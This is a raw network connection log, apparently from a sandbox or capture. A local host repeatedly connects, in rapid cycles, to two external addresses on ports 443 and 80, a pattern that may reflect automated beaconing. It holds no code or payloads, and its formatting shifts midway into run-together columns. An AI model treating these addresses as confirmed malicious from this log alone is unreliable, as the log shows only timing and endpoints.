Jan 10, 2025 23:12:09.104660034 CET  49989        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:09.104768038 CET  443          49989      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:09.104862928 CET  49989        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:09.105180025 CET  49989        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:09.105216026 CET  443          49989      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:09.148964882 CET  49988        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:09.774422884 CET  443          49989      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:09.776448011 CET  49989        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:09.776477098 CET  443          49989      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:09.776546001 CET  49989        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:09.776555061 CET  443          49989      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:09.991175890 CET  443          49989      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:09.991398096 CET  443          49989      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:09.991596937 CET  49989        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:09.992038965 CET  49989        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:09.995480061 CET  49988        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:09.996536016 CET  49990        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:10.000459909 CET  80           49988      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:10.001815081 CET  80           49990      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:10.001882076 CET  49988        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:10.001915932 CET  49990        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:10.002064943 CET  49990        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:10.006762028 CET  80           49990      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:10.675221920 CET  80           49990      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:10.677120924 CET  49992        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:10.677166939 CET  443          49992      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:10.677283049 CET  49992        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:10.677582979 CET  49992        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:10.677592039 CET  443          49992      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:10.727041006 CET  49990        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:11.288492918 CET  443          49992      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:11.295609951 CET  49992        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:11.295639992 CET  443          49992      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:11.295691013 CET  49992        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:11.295697927 CET  443          49992      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:11.628130913 CET  443          49992      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:11.628298044 CET  443          49992      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:11.628356934 CET  49992        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:11.628710985 CET  49992        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:11.631911039 CET  49990        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:11.632736921 CET  49993        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:11.636903048 CET  80           49990      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:11.637109041 CET  49990        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:11.637538910 CET  80           49993      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:11.637835979 CET  49993        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:11.637964964 CET  49993        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:11.642899036 CET  80           49993      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:12.316365957 CET  80           49993      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:12.318017960 CET  49994        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:12.318074942 CET  443          49994      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:12.318181992 CET  49994        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:12.318537951 CET  49994        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:12.318556070 CET  443          49994      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:12.368649960 CET  49993        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:12.994411945 CET  443          49994      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:12.996404886 CET  49994        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:12.996417046 CET  443          49994      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:12.996476889 CET  49994        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:12.996480942 CET  443          49994      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:13.282890081 CET  443          49994      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:13.283085108 CET  443          49994      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:13.283143997 CET  49994        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:13.283546925 CET  49994        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:13.287055969 CET  49993        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:13.288254023 CET  49995        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:13.292217970 CET  80           49993      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:13.292284966 CET  49993        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:13.293103933 CET  80           49995      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:13.293171883 CET  49995        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:13.293323040 CET  49995        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:13.298119068 CET  80           49995      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:13.975909948 CET  80           49995      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:13.977673054 CET  49996        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:13.977729082 CET  443          49996      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:13.977910042 CET  49996        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:13.978281021 CET  49996        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:13.978297949 CET  443          49996      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:14.023956060 CET  49995        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:14.597584963 CET  443          49996      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:14.599457979 CET  49996        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:14.599478960 CET  443          49996      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:14.599525928 CET  49996        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:14.599533081 CET  443          49996      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:14.861839056 CET  443          49996      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:14.862039089 CET  443          49996      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:14.862104893 CET  49996        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:14.862592936 CET  49996        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:14.868804932 CET  49995        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:14.869643927 CET  49997        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:14.873770952 CET  80           49995      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:14.873826027 CET  49995        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:14.874551058 CET  80           49997      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:14.874610901 CET  49997        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:14.874728918 CET  49997        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:14.879585028 CET  80           49997      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:15.584177971 CET  80           49997      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:15.585939884 CET  49998        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:15.586034060 CET  443          49998      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:15.586149931 CET  49998        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:15.586474895 CET  49998        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:15.586500883 CET  443          49998      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:15.633368969 CET  49997        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:16.203337908 CET  443          49998      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:16.205971956 CET  49998        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:16.205995083 CET  443          49998      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:16.206151962 CET  49998        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:16.206159115 CET  443          49998      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:17.130688906 CET  443          49998      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:17.130918026 CET  443          49998      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:17.131005049 CET  49998        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:17.131531000 CET  49998        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:17.135556936 CET  49997        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:17.136714935 CET  49999        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:17.140650988 CET  80           49997      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:17.140721083 CET  49997        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:17.141570091 CET  80           49999      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:17.141648054 CET  49999        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:17.141777039 CET  49999        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:17.146553993 CET  80           49999      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:17.826138973 CET  80           49999      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:17.841301918 CET  50000        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:17.841346025 CET  443          50000      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:17.841408014 CET  50000        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:17.841845989 CET  50000        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:17.841854095 CET  443          50000      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:17.867748976 CET  49999        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:18.463675976 CET  443          50000      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:18.465531111 CET  50000        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:18.465559006 CET  443          50000      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:18.465607882 CET  50000        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:18.465612888 CET  443          50000      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:18.755801916 CET  443          50000      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:18.756026983 CET  443          50000      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:18.756072998 CET  50000        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:18.757019997 CET  50000        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:18.763876915 CET  49999        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:18.765486956 CET  50001        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:18.769037962 CET  80           49999      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:18.769095898 CET  49999        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:18.770288944 CET  80           50001      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:18.770349979 CET  50001        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:18.770514011 CET  50001        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:18.775279045 CET  80           50001      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:19.448154926 CET  80           50001      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:19.449904919 CET  50002        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:19.449963093 CET  443          50002      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:19.450073004 CET  50002        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:19.450423002 CET  50002        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:19.450437069 CET  443          50002      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:19.492815971 CET  50001        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:20.067507029 CET  443          50002      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:20.069606066 CET  50002        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:20.069633007 CET  443          50002      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:20.069701910 CET  50002        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:20.069714069 CET  443          50002      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:20.282361984 CET  443          50002      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:20.282598019 CET  443          50002      149.154.167.220  192.168.2.9
Jan 10, 2025 23:12:20.282809019 CET  50002        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:20.283083916 CET  50002        443        192.168.2.9      149.154.167.220
Jan 10, 2025 23:12:20.286483049 CET  50001        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:20.287648916 CET  50003        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:20.291394949 CET  80           50001      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:20.291485071 CET  50001        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:20.294881105 CET  80           50003      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:20.294954062 CET  50003        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:20.295130014 CET  50003        80         192.168.2.9      132.226.247.73
Jan 10, 2025 23:12:20.300597906 CET  80           50003      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:21.003470898 CET  80           50003      132.226.247.73   192.168.2.9
Jan 10, 2025 23:12:21.004916906 CET  50004        443        192.168.2.9      149.154.167.220
                                                                                                          Jan 10, 2025 23:12:21.004978895 CET44350004149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:21.005050898 CET50004443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:21.005383968 CET50004443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:21.005402088 CET44350004149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:21.055181026 CET5000380192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:21.618637085 CET44350004149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:21.664635897 CET50004443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:21.674405098 CET50004443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:21.674437046 CET44350004149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:21.674514055 CET50004443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:21.674525976 CET44350004149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:21.929049015 CET44350004149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:21.929137945 CET44350004149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:21.929191113 CET50004443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:21.938342094 CET50004443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:21.966947079 CET5000380192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:21.968820095 CET5000580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:21.971991062 CET8050003132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:21.972047091 CET5000380192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:21.973571062 CET8050005132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:21.973629951 CET5000580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:21.973793030 CET5000580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:21.978555918 CET8050005132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:22.674274921 CET8050005132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:22.676007986 CET50006443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:22.676062107 CET44350006149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:22.676156044 CET50006443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:22.676456928 CET50006443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:22.676471949 CET44350006149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:22.727248907 CET5000580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:23.299375057 CET44350006149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:23.301276922 CET50006443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:23.301306963 CET44350006149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:23.301373959 CET50006443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:23.301379919 CET44350006149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:23.510442019 CET44350006149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:23.510510921 CET44350006149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:23.510620117 CET50006443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:23.511207104 CET50006443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:23.514564991 CET5000580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:23.515839100 CET5000780192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:23.519529104 CET8050005132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:23.519618034 CET5000580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:23.520591974 CET8050007132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:23.520647049 CET5000780192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:24.523998976 CET5000780192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:24.528892994 CET8050007132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:24.529021025 CET5000780192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:24.529258013 CET5000780192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:24.534034014 CET8050007132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:25.224337101 CET8050007132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:25.225759983 CET50008443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:25.225807905 CET44350008149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:25.225878000 CET50008443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:25.226283073 CET50008443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:25.226296902 CET44350008149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:25.274065971 CET5000780192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:25.860657930 CET44350008149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:25.862776041 CET50008443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:25.862804890 CET44350008149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:25.862884045 CET50008443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:25.862896919 CET44350008149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:26.221888065 CET44350008149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:26.221976042 CET44350008149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:26.222157955 CET50008443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:26.222794056 CET50008443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:26.226202011 CET5000780192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:26.227459908 CET5000980192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:26.231328964 CET8050007132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:26.231416941 CET5000780192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:26.232290030 CET8050009132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:26.232372046 CET5000980192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:26.232584000 CET5000980192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:26.237376928 CET8050009132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:26.935705900 CET8050009132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:26.937437057 CET50010443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:26.937557936 CET44350010149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:26.937686920 CET50010443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:26.938010931 CET50010443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:26.938045979 CET44350010149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:26.977180004 CET5000980192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:27.548384905 CET44350010149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:27.550390959 CET50010443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:27.550457001 CET44350010149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:27.550558090 CET50010443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:27.550571918 CET44350010149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:27.866807938 CET44350010149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:27.867024899 CET44350010149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:27.867113113 CET50010443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:27.867764950 CET50010443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:27.871054888 CET5000980192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:27.872523069 CET5001180192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:27.876069069 CET8050009132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:27.876148939 CET5000980192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:27.877356052 CET8050011132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:27.877419949 CET5001180192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:27.877578974 CET5001180192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:27.882340908 CET8050011132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:28.562705994 CET8050011132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:28.580652952 CET50012443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:28.580704927 CET44350012149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:28.580900908 CET50012443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:28.581087112 CET50012443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:28.581099033 CET44350012149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:28.617866039 CET5001180192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:29.217010975 CET44350012149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:29.218977928 CET50012443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:29.219019890 CET44350012149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:29.219101906 CET50012443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:29.219109058 CET44350012149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:29.438782930 CET44350012149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:29.438992977 CET44350012149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:29.439152002 CET50012443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:29.439465046 CET50012443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:29.442655087 CET5001180192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:29.443944931 CET5001380192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:29.447658062 CET8050011132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:29.447760105 CET5001180192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:29.448899031 CET8050013132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:29.448977947 CET5001380192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:29.449084997 CET5001380192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:29.453953028 CET8050013132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:30.129235983 CET8050013132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:30.131114006 CET50014443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:30.131237030 CET44350014149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:30.131357908 CET50014443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:30.131753922 CET50014443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:30.131783962 CET44350014149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:30.180253029 CET5001380192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:30.764349937 CET44350014149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:30.766067982 CET50014443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:30.766097069 CET44350014149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:30.766156912 CET50014443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:30.766165972 CET44350014149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:30.991671085 CET44350014149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:30.991883039 CET44350014149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:30.991947889 CET50014443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:30.993474007 CET50014443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:31.074763060 CET5001380192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:31.076488972 CET5001580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:31.079838037 CET8050013132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:31.079898119 CET5001380192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:31.081295967 CET8050015132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:31.081368923 CET5001580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:31.081629038 CET5001580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:31.086441040 CET8050015132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:31.791682005 CET8050015132.226.247.73192.168.2.9
                                                                                                          Jan 10, 2025 23:12:31.793494940 CET50016443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:31.793548107 CET44350016149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:31.793823957 CET50016443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:31.794059038 CET50016443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:31.794078112 CET44350016149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:31.836639881 CET5001580192.168.2.9132.226.247.73
                                                                                                          Jan 10, 2025 23:12:32.418206930 CET44350016149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:32.421983957 CET50016443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:32.421999931 CET44350016149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:32.422111988 CET50016443192.168.2.9149.154.167.220
                                                                                                          Jan 10, 2025 23:12:32.422118902 CET44350016149.154.167.220192.168.2.9
                                                                                                          Jan 10, 2025 23:12:32.714766026 CET44350016149.154.167.220192.168.2.9
Timestamp                            SrcPort  DstPort  Source IP        Dest IP
Jan 10, 2025 23:12:32.714848042 CET  443      50016    149.154.167.220  192.168.2.9
